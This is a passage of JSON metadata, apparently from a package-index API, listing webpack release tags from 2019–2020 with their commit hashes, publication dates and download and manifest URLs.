.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6/manifests"},{"name":"v5.0.0-beta.13","sha":"8445f06fa9abac1c98e6057af1c1fd2de63babbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"d